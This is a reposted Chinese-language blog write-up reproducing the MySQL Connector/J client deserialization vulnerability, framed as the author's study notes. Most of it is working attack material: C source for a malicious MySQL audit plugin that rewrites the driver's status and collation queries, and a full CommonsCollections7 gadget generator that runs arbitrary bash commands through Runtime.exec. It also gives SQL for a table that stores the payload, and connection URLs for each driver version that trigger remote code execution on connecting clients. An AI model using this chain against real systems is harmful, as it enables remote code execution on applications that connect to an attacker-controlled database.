dual mysql 获取序列_MySQL JDBC客户端反序列化漏洞
生活随笔
收集整理的這篇文章主要介紹了
dual mysql 获取序列_MySQL JDBC客户端反序列化漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
標題: MySQL JDBC客戶端反序列化漏洞
☆?背景介紹☆?學習思路
☆?搭建測試環境
☆?惡意MySQL插件
????1)?獲取MySQL?5.7.28源碼
????2)?在rewrite_example基礎上修改出evilreplace
☆?測試rewriter插件
????1)?安裝rewriter.so
????2)?在服務端替換SQL查詢語句
????3)?卸載rewriter.so
????4)?rewriter插件的局限性
☆?漏洞相關的SQL查詢語句
????1)?SHOW?SESSION?STATUS
????2)?SHOW?COLLATION
☆?復現漏洞
????1)?GenerateCommonsCollections7.java
????2)?創建惡意表
????3)?用evilreplace插件改變SQL查詢語句
????4)?JDBCClient.java
????5)?MySQL?Connector/J?各版本所需URL(ServerStatusDiffInterceptor)
????????5.1)?8.x
????????????5.1.1)?簡化版調用關系
????????????5.1.2)?mysql-connector-java-8.0.14.pcap
????????5.2)?6.x
????????????5.2.2)?mysql-connector-java-6.0.3.pcap
????????5.3)?5.1.11及以上版本
????????????5.3.2)?mysql-connector-java-5.1.40.pcap
????6)?MySQL?Connector/J?各版本所需URL(detectCustomCollations)
????????6.1)?5.1.29-5.1.40
????????????6.1.1)?簡化版調用關系
????????????6.1.2)?mysql-connector-java-5.1.40_d.pcap
????????6.2)?5.1.19-5.1.28
????????????6.2.2)?mysql-connector-java-5.1.19_d.pcap
????7)?Python版惡意服務端
????????7.1)?fnmsd的實現
????????7.2)?其他思路
☆?參考資源
☆ 背景介紹
2019年11月底Yang Zhang等人在BlackHat上有個議題,提到MySQL JDBC客戶端反序列化漏洞,用到ServerStatusDiffInterceptor,參[1]。
2019年12月Welkin給出了部分細節,但當時未解決惡意服務端的組建問題,參[2]。
codeplutos利用修改過的MySQL插件成功組建惡意服務端,這個腦洞開得可以。與此同時,他演示了另一條利用路徑,用到detectCustomCollations。需要指出,他的方案原理同時適用于ServerStatusDiffInterceptor、detectCustomCollations,他只以后者舉例而已。參[3]。
2020年4月fnmsd分析MySQL Connector/J各版本后給出大一統的總結,給出不同版本所需URL,給了Python版惡意服務端,參[4]。
2020年5月我學習前幾位的大作,寫了這篇筆記。
☆ 學習思路
先將[1]、[2]、[3]、[4]全看了一遍,沒做實驗,只是看。對這個洞大概有點數,通過JDBC建立到MySQL服務端的連接時,有幾個內置的SQL查詢語句被發出,其中兩個查詢的結果集在客戶端被處理時會調用ObjectInputStream.readObject()進行反序列化。通過控制結果集,可以在客戶端搞事,具體危害視客戶端擁有的Gadget環境而定。
這兩個查詢語句是:
SHOW SESSION STATUS
SHOW COLLATION
利用MySQL插件機制將這兩個查詢語句在服務端"重定向"成查詢惡意表,惡意表中某字段存放惡意Object。
需要安裝MySQL,創建惡意表,編譯定制過的惡意MySQL插件。寫一個通用的JDBC客戶端程序,用之訪問惡意服務端。用Wireshark抓包,基于抓包數據用Python實現簡版惡意服務端,這樣可以避免陷入MySQL私有協議細節當中。
☆ 搭建測試環境
參看
《惡意MySQL Server讀取MySQL Client端文件》
http://scz.617.cn/network/202001101612.txt
☆ 惡意MySQL插件
1) 獲取MySQL 5.7.28源碼
https://repo.mysql.com/yum/mysql-5.7-community/el/7/SRPMS/mysql-community-5.7.28-1.el7.src.rpm2) 在rewrite_example基礎上修改出evilreplace
$?vi?evilreplace.cc#include?
#include?
#include?
#include?
#include?
#include?
#include??//?my_thread_handle?needed?by?mysql_memory.h
#include?
/*?instrument?the?memory?allocation?*/
#ifdef?HAVE_PSI_INTERFACE
static?PSI_memory_key?key_memory_evilreplace;
static?PSI_memory_info?all_rewrite_memory[]=
{
??{?&key_memory_evilreplace,?"evilreplace",?0?}
};
static?int?plugin_init(MYSQL_PLUGIN){
??const?char*?category=?"sql";
??int?count;
??count=?array_elements(all_rewrite_memory);
??mysql_memory_register(category,?all_rewrite_memory,?count);
??return?0;?/*?success?*/
}
#else
#define?plugin_init?NULL
#define?key_memory_evilreplace?PSI_NOT_INSTRUMENTED
#endif?/*?HAVE_PSI_INTERFACE?*/
static?int?rewrite_lower(MYSQL_THD?thd,?mysql_event_class_t?event_class,const?void?*event){
??if?(event_class?==?MYSQL_AUDIT_PARSE_CLASS)
??{
????const?struct?mysql_event_parse?*event_parse=static_cast(event);
????if?(event_parse->event_subclass?==?MYSQL_AUDIT_PARSE_PREPARSE)
????{
????????if
????????(
????????????(?strcmp(?event_parse->query.str,?"SHOW?SESSION?STATUS"?)?==?0?)
????????????||
????????????(?strcmp(?event_parse->query.str,?"SHOW?COLLATION"?)?==?0?)
????????)
????????{
????????????char????evilsql[]???????=?"select?evil_1,evil_2,evil_3?from?evildb.eviltable?limit?1;";
????????????char???*rewritten_query?=?static_cast<char?*>
????????????(
????????????????my_malloc
????????????????(
????????????????????key_memory_evilreplace,
????????????????????strlen(?evilsql?)?+?1,
????????????????????MYF(0)
????????????????)
????????????);
????????????strcpy(?rewritten_query,?evilsql?);
????????????event_parse->rewritten_query->str???????=?rewritten_query;
????????????event_parse->rewritten_query->length????=?strlen(?evilsql?)?+?1;
????????????*((int?*)event_parse->flags)???????????|=?(int)MYSQL_AUDIT_PARSE_REWRITE_PLUGIN_QUERY_REWRITTEN;
????????}
????}
??}
??return?0;
}
/*?Audit?plugin?descriptor?*/
static?struct?st_mysql_audit?evilreplace_descriptor=
{
??MYSQL_AUDIT_INTERFACE_VERSION,????????????????????/*?interface?version?*/
??NULL,?????????????????????????????????????????????/*?release_thd()?????*/
??rewrite_lower,????????????????????????????????????/*?event_notify()????*/
??{?0,
????0,
????(unsigned?long)?MYSQL_AUDIT_PARSE_ALL,?}????????/*?class?mask????????*/
};
/*?Plugin?descriptor?*/
mysql_declare_plugin(audit_log)
{
??MYSQL_AUDIT_PLUGIN,?????????????/*?plugin?type???????????????????*/
??&evilreplace_descriptor,????/*?type?specific?descriptor??????*/
??"evilreplace",??????????????/*?plugin?name???????????????????*/
??"Oracle",???????????????????????/*?author????????????????????????*/
??"An?example?of?a?query?rewrite"
??"?plugin?that?rewrites?all?queries"
??"?to?lower?case",???????????????/*?description???????????????????*/
??PLUGIN_LICENSE_GPL,?????????????/*?license???????????????????????*/
??plugin_init,????????????????????/*?plugin?initializer????????????*/
??NULL,???????????????????????????/*?plugin?deinitializer??????????*/
??0x0002,?????????????????????????/*?version???????????????????????*/
??NULL,???????????????????????????/*?status?variables??????????????*/
??NULL,???????????????????????????/*?system?variables??????????????*/
??NULL,???????????????????????????/*?reserverd?????????????????????*/
??0???????????????????????????????/*?flags?????????????????????????*/
}
mysql_declare_plugin_end;
參[3],codeplutos介紹了Ubuntu 16.04下的MySQL插件編譯方案。各發行版的編譯過程差別較大,RedHat 7.6上明顯不同,建議先搞清楚如何編譯MySQL源碼,再來編譯單個插件。
編譯:
/usr/bin/c++?-DHAVE_CONFIG_H?-DHAVE_LIBEVENT2?-DMYSQL_DYNAMIC_PLUGIN?-D_FILE_OFFSET_BITS=64?\-D_GNU_SOURCE?-Devilreplace_EXPORTS?-Wall?-Wextra?-Wformat-security?-Wvla?-Woverloaded-virtual?\
-Wno-unused-parameter?-O3?-g?-fabi-version=2?-fno-omit-frame-pointer?-fno-strict-aliasing?-DDBUG_OFF?-fPIC?\
-I//mysql-5.7.28/include?\
-I//mysql-5.7.28/extra/rapidjson/include?\
-I//mysql-5.7.28/libbinlogevents/include?\
-I//mysql-5.7.28/libbinlogevents/export?\
-isystem?//mysql-5.7.28/zlib?\
-I//mysql-5.7.28/sql?\
-I//mysql-5.7.28/sql/auth?\
-I//mysql-5.7.28/regex?\
-o?evilreplace.cc.o?\
-c?evilreplace.cc
鏈接:
/usr/bin/c++?-fPIC?-Wall?-Wextra?-Wformat-security?-Wvla?-Woverloaded-virtual?-Wno-unused-parameter?\-O3?-g?-fabi-version=2?-fno-omit-frame-pointer?-fno-strict-aliasing?-DDBUG_OFF?\
-fPIC?-shared?-Wl,-soname,evilreplace.so?-o?evilreplace.so?\
evilreplace.cc.o?-lpthread?\
//libmysqlservices.a?-lpthread
☆ 測試rewriter插件
rewriter.so是自帶的插件,不需要源碼編譯。
1) 安裝rewriter.so
查看:
/usr/share/mysql/install_rewriter.sql
除了安裝rewriter.so,還涉及輔助表和存儲過程的創建。
mysql> source /usr/share/mysql/install_rewriter.sql
這會多出query_rewrite庫、query_rewrite.rewrite_rules表。
mysql>?show?plugins;+----------------------------+----------+--------------------+----------------------+---------+
|?Name???????????????????????|?Status???|?Type???????????????|?Library??????????????|?License?|
+----------------------------+----------+--------------------+----------------------+---------+
...
|?Rewriter???????????????????|?ACTIVE???|?AUDIT??????????????|?rewriter.so??????????|?GPL?????|
+----------------------------+----------+--------------------+----------------------+---------+
mysql>?SHOW?GLOBAL?VARIABLES?LIKE?'rewriter_enabled';
+------------------+-------+
|?Variable_name????|?Value?|
+------------------+-------+
|?rewriter_enabled?|?ON????|
+------------------+-------+
2) 在服務端替換SQL查詢語句
向query_rewrite.rewrite_rules表中插入替換規則:
mysql>?insert?into?query_rewrite.rewrite_rules(pattern,?replacement)?values('select?line?from?sczdb.SczTable',?'select?line?from?sczdb.scztable?limit?1');調用存儲過程刷新,使之熱生效:
mysql>?call?query_rewrite.flush_rewrite_rules();測試替換規則:
mysql>?select?line?from?sczdb.SczTable;+---------------------------------+
|?line????????????????????????????|
+---------------------------------+
|?root:x:0:0:root:/root:/bin/bash?|
+---------------------------------+
3) 卸載rewriter.so
mysql>?source?/usr/share/mysql/uninstall_rewriter.sql只有退出當前客戶端才徹底卸載rewriter插件,否則其仍在生效中。
4) rewriter插件的局限性
清空表,二選一,推薦后者:
delete?from?query_rewrite.rewrite_rules;truncate?table?query_rewrite.rewrite_rules;
mysql>?insert?into?query_rewrite.rewrite_rules(pattern,?replacement)?values('SHOW?SESSION?STATUS',?'select?*?from?evildb.eviltable');
mysql>?select?*?from?query_rewrite.rewrite_rules;
+----+---------------------+------------------+--------------------------------+---------+---------+----------------+--------------------+
|?id?|?pattern?????????????|?pattern_database?|?replacement????????????????????|?enabled?|?message?|?pattern_digest?|?normalized_pattern?|
+----+---------------------+------------------+--------------------------------+---------+---------+----------------+--------------------+
|??1?|?SHOW?SESSION?STATUS?|?NULL?????????????|?select?*?from?evildb.eviltable?|?YES?????|?NULL????|?NULL???????????|?NULL???????????????|
+----+---------------------+------------------+--------------------------------+---------+---------+----------------+--------------------+
mysql>?call?query_rewrite.flush_rewrite_rules();
ERROR?1644?(45000):?Loading?of?some?rule(s)?failed.
調用存儲過程刷新時意外失敗,查看失敗原因:
mysql>?select?message?from?query_rewrite.rewrite_rules;+-------------------------------------------+
|?message???????????????????????????????????|
+-------------------------------------------+
|?Pattern?needs?to?be?a?a?select?statement.?|
+-------------------------------------------+
pattern必須是select語句,show語句不行。
據說5.7的pattern只支持select,8.0支持insert、update、delete,未實測驗證。難怪codeplutos要修改rewrite_example.cc。
☆ 漏洞相關的SQL查詢語句
1) SHOW SESSION STATUS
mysql>?help?SHOW...
SHOW?COLLATION?[like_or_where]
...
SHOW?[GLOBAL?|?SESSION]?STATUS?[like_or_where]
...
If?the?syntax?for?a?given?SHOW?statement?includes?a?LIKE?'pattern'
part,?'pattern'?is?a?string?that?can?contain?the?SQL?%?and?_?wildcard
characters.?The?pattern?is?useful?for?restricting?statement?output?to
matching?values.
...
URL:?https://dev.mysql.com/doc/refman/5.7/en/show.html
mysql>?help?SHOW?STATUS
...
URL:?https://dev.mysql.com/doc/refman/5.7/en/show-status.html
"SHOW SESSION STATUS"訪問INFORMATION_SCHEMA.SESSION_STATUS表。參[2],作者說訪問INFORMATION_SCHEMA.SESSION_VARIABLES表,他應該說錯了。
查看INFORMATION_SCHEMA.SESSION_STATUS表結構:
mysql>?select?table_schema,table_name,column_name,column_type?from?information_schema.columns?where?table_name='SESSION_STATUS';+--------------------+----------------+----------------+---------------+
|?table_schema???????|?table_name?????|?column_name????|?column_type???|
+--------------------+----------------+----------------+---------------+
|?information_schema?|?SESSION_STATUS?|?VARIABLE_NAME??|?varchar(64)???|
|?information_schema?|?SESSION_STATUS?|?VARIABLE_VALUE?|?varchar(1024)?|
+--------------------+----------------+----------------+---------------+
直接訪問INFORMATION_SCHEMA.SESSION_STATUS表缺省會失敗:
mysql>?select?VARIABLE_NAME,VARIABLE_VALUE?from?INFORMATION_SCHEMA.SESSION_STATUS?limit?10;ERROR?3167?(HY000):?The?'INFORMATION_SCHEMA.SESSION_STATUS'?feature?is?disabled;?see?the?documentation?for?'show_compatibility_56'
需要打開一個開關:
mysql>?set?@@global.show_compatibility_56=ON;mysql>?select?*?from?INFORMATION_SCHEMA.SESSION_STATUS?limit?10;
mysql>?select?VARIABLE_NAME,VARIABLE_VALUE?from?INFORMATION_SCHEMA.SESSION_STATUS?limit?10;
+----------------------------+----------------+
|?VARIABLE_NAME??????????????|?VARIABLE_VALUE?|
+----------------------------+----------------+
|?ABORTED_CLIENTS????????????|?1??????????????|
|?ABORTED_CONNECTS???????????|?0??????????????|
|?BINLOG_CACHE_DISK_USE??????|?0??????????????|
|?BINLOG_CACHE_USE???????????|?0??????????????|
|?BINLOG_STMT_CACHE_DISK_USE?|?0??????????????|
|?BINLOG_STMT_CACHE_USE??????|?0??????????????|
|?BYTES_RECEIVED?????????????|?2809???????????|
|?BYTES_SENT?????????????????|?11620??????????|
|?COM_ADMIN_COMMANDS?????????|?0??????????????|
|?COM_ASSIGN_TO_KEYCACHE?????|?0??????????????|
+----------------------------+----------------+
2) SHOW COLLATION
mysql>?help?SHOW?COLLATION;...
URL:?https://dev.mysql.com/doc/refman/5.7/en/show-collation.html
mysql>?SHOW?COLLATION?WHERE?Charset='latin1';
+-------------------+---------+----+---------+----------+---------+
|?Collation?????????|?Charset?|?Id?|?Default?|?Compiled?|?Sortlen?|
+-------------------+---------+----+---------+----------+---------+
|?latin1_german1_ci?|?latin1??|??5?|?????????|?Yes??????|???????1?|
|?latin1_swedish_ci?|?latin1??|??8?|?Yes?????|?Yes??????|???????1?|
|?latin1_danish_ci??|?latin1??|?15?|?????????|?Yes??????|???????1?|
|?latin1_german2_ci?|?latin1??|?31?|?????????|?Yes??????|???????2?|
|?latin1_bin????????|?latin1??|?47?|?????????|?Yes??????|???????1?|
|?latin1_general_ci?|?latin1??|?48?|?????????|?Yes??????|???????1?|
|?latin1_general_cs?|?latin1??|?49?|?????????|?Yes??????|???????1?|
|?latin1_spanish_ci?|?latin1??|?94?|?????????|?Yes??????|???????1?|
+-------------------+---------+----+---------+----------+---------+
"SHOW COLLATION"訪問INFORMATION_SCHEMA.COLLATIONS表。
查看INFORMATION_SCHEMA.COLLATIONS表結構:
mysql>?select?table_schema,table_name,column_name,column_type?from?information_schema.columns?where?table_name='COLLATIONS';+--------------------+------------+--------------------+-------------+
|?table_schema???????|?table_name?|?column_name????????|?column_type?|
+--------------------+------------+--------------------+-------------+
|?information_schema?|?COLLATIONS?|?COLLATION_NAME?????|?varchar(32)?|
|?information_schema?|?COLLATIONS?|?CHARACTER_SET_NAME?|?varchar(32)?|
|?information_schema?|?COLLATIONS?|?ID?????????????????|?bigint(11)??|
|?information_schema?|?COLLATIONS?|?IS_DEFAULT?????????|?varchar(3)??|
|?information_schema?|?COLLATIONS?|?IS_COMPILED????????|?varchar(3)??|
|?information_schema?|?COLLATIONS?|?SORTLEN????????????|?bigint(3)???|
+--------------------+------------+--------------------+-------------+
可以直接訪問INFORMATION_SCHEMA.COLLATIONS表,與show_compatibility_56無關。
mysql>?show?variables?like?'show_compatibility_56';+-----------------------+-------+
|?Variable_name?????????|?Value?|
+-----------------------+-------+
|?show_compatibility_56?|?OFF???|
+-----------------------+-------+
mysql>?select?*?from?INFORMATION_SCHEMA.COLLATIONS?limit?5;
+------------------+--------------------+----+------------+-------------+---------+
|?COLLATION_NAME???|?CHARACTER_SET_NAME?|?ID?|?IS_DEFAULT?|?IS_COMPILED?|?SORTLEN?|
+------------------+--------------------+----+------------+-------------+---------+
|?big5_chinese_ci??|?big5???????????????|??1?|?Yes????????|?Yes?????????|???????1?|
|?big5_bin?????????|?big5???????????????|?84?|????????????|?Yes?????????|???????1?|
|?dec8_swedish_ci??|?dec8???????????????|??3?|?Yes????????|?Yes?????????|???????1?|
|?dec8_bin?????????|?dec8???????????????|?69?|????????????|?Yes?????????|???????1?|
|?cp850_general_ci?|?cp850??????????????|??4?|?Yes????????|?Yes?????????|???????1?|
+------------------+--------------------+----+------------+-------------+---------+
☆ 復現漏洞
1) GenerateCommonsCollections7.java
/*?*?javac?-encoding?GBK?-g?-cp?"commons-collections-3.1.jar"?GenerateCommonsCollections7.java
?*?java?-cp?"commons-collections-3.1.jar:."?GenerateCommonsCollections7?"/bin/touch?/tmp/scz_is_here"?/tmp/out.bin
?*/
import?java.io.*;
import?java.util.*;
import?java.lang.reflect.*;
import?javax.naming.*;
import?org.apache.commons.collections.Transformer;
import?org.apache.commons.collections.functors.*;
import?org.apache.commons.collections.map.LazyMap;
public?class?GenerateCommonsCollections7{
????/*
?????*?ysoserial/CommonsCollections7
?????*/
????@SuppressWarnings("unchecked")
????private?static?Object?getObject?(?String?cmd?)?throws?Exception{
????????Transformer[]???tarray??????=?new?Transformer[]
????????{
????????????new?ConstantTransformer(?Runtime.class?),
????????????new?InvokerTransformer
????????????(
????????????????"getMethod",
????????????????new?Class[]
????????????????{
????????????????????String.class,
????????????????????Class[].class
????????????????},
????????????????new?Object[]
????????????????{
????????????????????"getRuntime",
????????????????????new?Class[0]
????????????????}
????????????),
????????????new?InvokerTransformer
????????????(
????????????????"invoke",
????????????????new?Class[]
????????????????{
????????????????????Object.class,
????????????????????Object[].class
????????????????},
????????????????new?Object[]
????????????????{
????????????????????null,
????????????????????new?Object[0]
????????????????}
????????????),
????????????new?InvokerTransformer
????????????(
????????????????"exec",
????????????????new?Class[]
????????????????{
????????????????????String[].class
????????????????},
????????????????new?Object[]
????????????????{
????????????????????new?String[]
????????????????????{
????????????????????????"/bin/bash",
????????????????????????"-c",
????????????????????????cmd
????????????????????}
????????????????}
????????????)
????????};
????????Transformer?????tchain??????=?new?ChainedTransformer(?new?Transformer[0]?);
????????Map?????????????normalMap_0?=?new?HashMap();
????????Map?????????????normalMap_1?=?new?HashMap();
????????Map?????????????lazyMap_0???=?LazyMap.decorate(?normalMap_0,?tchain?);
????????Map?????????????lazyMap_1???=?LazyMap.decorate(?normalMap_1,?tchain?);
????????lazyMap_0.put(?"scz",?"same"?);
????????lazyMap_1.put(?"tDz",?"same"?);
????????Hashtable???????ht??????????=?new?Hashtable();
????????ht.put(?lazyMap_0,?"value_0"?);
????????ht.put(?lazyMap_1,?"value_1"?);
????????lazyMap_1.remove(?"scz"?);
????????Field???????????f???????????=?ChainedTransformer.class.getDeclaredField(?"iTransformers"?);
????????f.setAccessible(?true?);
????????f.set(?tchain,?tarray?);
????????return(?ht?);
????}
????public?static?void?main?(?String[]?argv?)?throws?Exception{
????????String??????????????cmd?????=?argv[0];
????????String??????????????out?????=?argv[1];
????????Object??????????????obj?????=?getObject(?cmd?);
????????FileOutputStream????fos?=?new?FileOutputStream(?out?);
????????ObjectOutputStream??oos?=?new?ObjectOutputStream(?fos?);
????????oos.writeObject(?obj?);
????????oos.close();
????????fos.close();
????}
}
java?-cp?"commons-collections-3.1.jar:."?GenerateCommonsCollections7?"/bin/touch?/tmp/scz_is_here"?/tmp/out.bin
xxd?-p?-c?1000000?/tmp/out.bin
輸出形如:
aced00057372…3178
2) 創建惡意表
DROP?TABLE?IF?EXISTS?evildb.eviltable;DROP?DATABASE?IF?EXISTS?evildb;
CREATE?DATABASE?IF?NOT?EXISTS?evildb;
CREATE?TABLE?IF?NOT?EXISTS?evildb.eviltable
(
????evil_1??int(5),
????evil_2??blob,
????evil_3??int(5)
);
set?@obj=0xaced00057372...3178;
INSERT?INTO?evildb.eviltable?VALUES?(1,?@obj,?3);
UPDATE?evildb.eviltable?SET?evil_1=1,?evil_2=@obj,?evil_3=3;
select?lower(hex(evil_2))?from?evildb.eviltable;
SHOW?GRANTS?FOR?root;
GRANT?ALL?ON?evildb.eviltable?TO?'root'@'%';
REVOKE?ALL?ON?evildb.eviltable?FROM?'root'@'%';
evil_1、evil_3也可以用blob類型,填充同樣的@obj,觸發點略有差異。上面演示的惡意表是最小集,通吃。
3) 用evilreplace插件改變SQL查詢語句
用evilreplace插件將來自客戶端的:
SHOW SESSION STATUS
SHOW COLLATION
替換成:
select?evil_1,evil_2,evil_3?from?evildb.eviltable?limit?1;參[3],這是codeplutos的思路,很有想像力,他用了自編譯rewrite_example.so。
INSTALL?PLUGIN?evilreplace?SONAME?'evilreplace.so';SHOW?SESSION?STATUS;
SHOW?COLLATION;
UNINSTALL?PLUGIN?evilreplace;
4) JDBCClient.java
/*?*?javac?-encoding?GBK?-g?JDBCClient.java
?*/
import?java.io.*;
import?java.sql.*;
public?class?JDBCClient{
????public?static?void?main?(?String[]?argv?)?throws?Exception{
????????String??????url?????=?argv[0];
????????Connection??conn????=?DriverManager.getConnection(?url?);
????}
}
JDBCClient.java無需顯式代碼:
Class.forName(?"com.mysql.cj.jdbc.Driver"?);5) MySQL Connector/J 各版本所需URL(ServerStatusDiffInterceptor)
參[4],fnmsd分析了各種版本所需URL。
5.1) 8.x
java?\-cp?"mysql-connector-java-8.0.14.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"
5.1.1) 簡化版調用關系
DriverManager.getConnection?????????????????????????????????????????//?8u232+8.0.14??DriverManager.getConnection???????????????????????????????????????//?DriverManager:270
????NonRegisteringDriver.connect????????????????????????????????????//?DriverManager:664
??????ConnectionImpl.getInstance????????????????????????????????????//?NonRegisteringDriver:199
????????ConnectionImpl.???????????????????????????????????????//?ConnectionImpl:240
??????????ConnectionImpl.initializeSafeQueryInterceptors????????????//?ConnectionImpl:448
??????????ConnectionImpl.createNewIO????????????????????????????????//?ConnectionImpl:455
????????????ConnectionImpl.connectOneTryOnly????????????????????????//?ConnectionImpl:825
??????????????ConnectionImpl.initializePropsFromServer??????????????//?ConnectionImpl:966
????????????????ConnectionImpl.handleAutoCommitDefaults?????????????//?ConnectionImpl:1327
??????????????????ConnectionImpl.setAutoCommit??????????????????????//?ConnectionImpl:1382
????????????????????NativeSession.execSQL???????????????????????????//?ConnectionImpl:2064//?查詢語句"SET?autocommit=1"
??????????????????????NativeProtocol.sendQueryString????????????????//?NativeSession:1154
????????????????????????NativeProtocol.sendQueryPacket??????????????//?NativeProtocol:921if?(this.queryInterceptors?!=?null)???????//?NativeProtocol:969
??????????????????????????NativeProtocol.invokeQueryInterceptorsPre?//?NativeProtocol:970
????????????????????????????NoSubInterceptorWrapper.preProcess??????//?NativeProtocol:1144
??????????????????????????????ServerStatusDiffInterceptor.preProcess//?NoSubInterceptorWrapper:76
????????????????????????????????ServerStatusDiffInterceptor.populateMapWithSessionStatusValues//?ServerStatusDiffInterceptor:105
??????????????????????????????????rs?=?stmt.executeQuery("SHOW?SESSION?STATUS")//?ServerStatusDiffInterceptor:86//?自動提交SQL查詢
??????????????????????????????????ResultSetUtil.resultSetToMap??????//?ServerStatusDiffInterceptor:87
????????????????????????????????????ResultSetImpl.getObject?????????//?ResultSetUtil:46//?mappedValues.put(rs.getObject(1),?rs.getObject(2))//?處理結果集中第1、2列if?((field.isBinary())?||?(field.isBlob()))//?ResultSetImpl:1314
??????????????????????????????????????byte[]?data?=?getBytes(columnIndex)//?ResultSetImpl:1315if?(this.connection.getPropertySet().getBooleanProperty(PropertyKey.autoDeserialize).getValue())//?ResultSetImpl:1317//?要求autoDeserialize等于true
??????????????????????????????????????ObjectInputStream.readObject??//?ResultSetImpl:1326//?obj?=?objIn.readObject();
????????????????????????????????????????Hashtable.readObject????????//?ysoserial/CommonsCollections7
??????????????????????????????????????????Hashtable.reconstitutionPut
????????????????????????????????????????????AbstractMapDecorator.equals
??????????????????????????????????????????????AbstractMap.equals
????????????????????????????????????????????????LazyMap.get?????????//?此處開始LazyMap利用鏈
??????????????????????????????????????????????????ChainedTransformer.transform
????????????????????????????????????????????????????InvokerTransformer.transform
??????????????????????????????????????????????????????Runtime.execif?(this.queryInterceptors?!=?null)???????//?NativeProtocol:1109
??????????????????????????NativeProtocol.invokeQueryInterceptorsPost//?NativeProtocol:1110
5.1.2) mysql-connector-java-8.0.14.pcap
請自行抓包,此處略
5.2) 6.x
queryInterceptors => statementInterceptors
java?\-cp?"mysql-connector-java-6.0.3.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"
5.2.2) mysql-connector-java-6.0.3.pcap
請自行抓包,此處略
5.3) 5.1.11及以上版本
com.mysql.cj. => com.mysql.
java?\-cp?"mysql-connector-java-5.1.40.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor"
5.3.2) mysql-connector-java-5.1.40.pcap
請自行抓包,此處略
6) MySQL Connector/J 各版本所需URL(detectCustomCollations)
參[3],觸發方式是codeplutos提供的。重點看這個函數:
com.mysql.jdbc.ConnectionImpl.buildCollationMapping()參[4],fnmsd分析了各種版本所需URL。
6.1) 5.1.29-5.1.40
java?\-cp?"mysql-connector-java-5.1.40.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true&detectCustomCollations=true"
會拋異常,但惡意代碼已被執行。
6.1.1) 簡化版調用關系
DriverManager.getConnection?????????????????????????????????????????//?8u232+5.1.40??DriverManager.getConnection???????????????????????????????????????//?DriverManager:270
????NonRegisteringDriver.connect????????????????????????????????????//?DriverManager:664
??????ConnectionImpl.getInstance????????????????????????????????????//?NonRegisteringDriver:328
????????Util.handleNewInstance??????????????????????????????????????//?ConnectionImpl:410
??????????Constructor.newInstance???????????????????????????????????//?Util:425JDBC4Connection.<init>ConnectionImpl.<init>?????????????????????????????????//?JDBC4Connection:47ConnectionImpl.initializeSafeStatementInterceptors??//?ConnectionImpl:805ConnectionImpl.createNewIO??????????????????????????//?ConnectionImpl:806ConnectionImpl.connectOneTryOnly??????????????????//?ConnectionImpl:2083ConnectionImpl.initializePropsFromServer????????//?ConnectionImpl:2297if?(versionMeetsMinimum(3,?21,?22))???????????//?ConnectionImpl:3282ConnectionImpl.buildCollationMapping??????????//?ConnectionImpl:3291if?((versionMeetsMinimum(4,?1,?0))?&&?(getDetectCustomCollations()))//?ConnectionImpl:944//?5.1.28版只檢查版本號,未檢查detectCustomCollations屬性results?=?stmt.executeQuery("SHOW?COLLATION")//?ConnectionImpl:957//?自動提交SQL查詢if?(versionMeetsMinimum(5,?0,?0))???????????//?ConnectionImpl:958Util.resultSetToMap?????????????????????????//?ConnectionImpl:959//?Util.resultSetToMap(sortedCollationMap,?results,?3,?2)//?處理結果集中第3、2列ResultSetImpl.getObject???????????????????//?Util:474//?mappedValues.put(rs.getObject(key),?rs.getObject(value))ResultSetImpl.getObjectDeserializingIfNeeded//?ResultSetImpl:4544byte[]?data?=?getBytes(columnIndex)???//?ResultSetImpl:4568ObjectInputStream.readObject??????????//?ResultSetImpl:4579//?obj?=?objIn.readObject()Hashtable.readObject????????????????//?ysoserial/CommonsCollections7Hashtable.reconstitutionPutAbstractMapDecorator.equalsAbstractMap.equalsLazyMap.get?????????????????//?此處開始LazyMap利用鏈ChainedTransformer.transformInvokerTransformer.transformRuntime.exec
6.1.2) mysql-connector-java-5.1.40_d.pcap
請自行抓包,此處略
6.2) 5.1.19-5.1.28
不需要指定"detectCustomCollations=true"
java?\-cp?"mysql-connector-java-5.1.19.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true"
6.2.2) mysql-connector-java-5.1.19_d.pcap
請自行抓包,此處略
7) Python版惡意服務端
7.1) fnmsd的實現
https://github.com/fnmsd/MySQL_Fake_Server
他這個實現同時支持ServerStatusDiffInterceptor、detectCustomCollations,還支持"惡意MySQL Server讀取MySQL Client端文件",只需要Python3。
他在"踩過的坑"里寫了一些值得注意的點,有興趣者可以看他的源碼。
7.2) 其他思路
fnmsd的實現,功能完備。如果只是想搞標題所說漏洞,我說個別的思路。可以基于Gifts版本實現反序列化惡意服務端:
https://github.com/Gifts/Rogue-MySql-Server
ServerStatusDiffInterceptor適用范圍包含detectCustomCollations適用范圍,為了減少麻煩,可以只支持ServerStatusDiffInterceptor。具體來說,就是只特殊響應"SHOW SESSION STATUS",不特殊響應"SHOW COLLATION"。
基于三次抓包組織響應報文:
mysql-connector-java-5.1.40.pcap
mysql-connector-java-6.0.3.pcap
mysql-connector-java-8.0.14.pcap
要點如下:
5.1.11及以上版本6.x
????特殊響應"SHOW?SESSION?STATUS",然后必須特殊響應隨后而來的
????"SHOW?WARNINGS"。
8.x
????按抓包所示響應初始查詢:
????/*?mysql-connector-java-8.0.14?(Revision:?36534fa273b4d7824a8668ca685465cf8eaeadd9)?*/SELECT?...
????然后按抓包所示響應隨后而來的"SHOW?WARNINGS"。
????特殊響應"SHOW?SESSION?STATUS",然后必須特殊響應隨后而來的
????"SHOW?WARNINGS"。
這種搞法的好處是不用特別理解MySQL私有協議,fnmsd"踩過的坑"你都不會碰上。
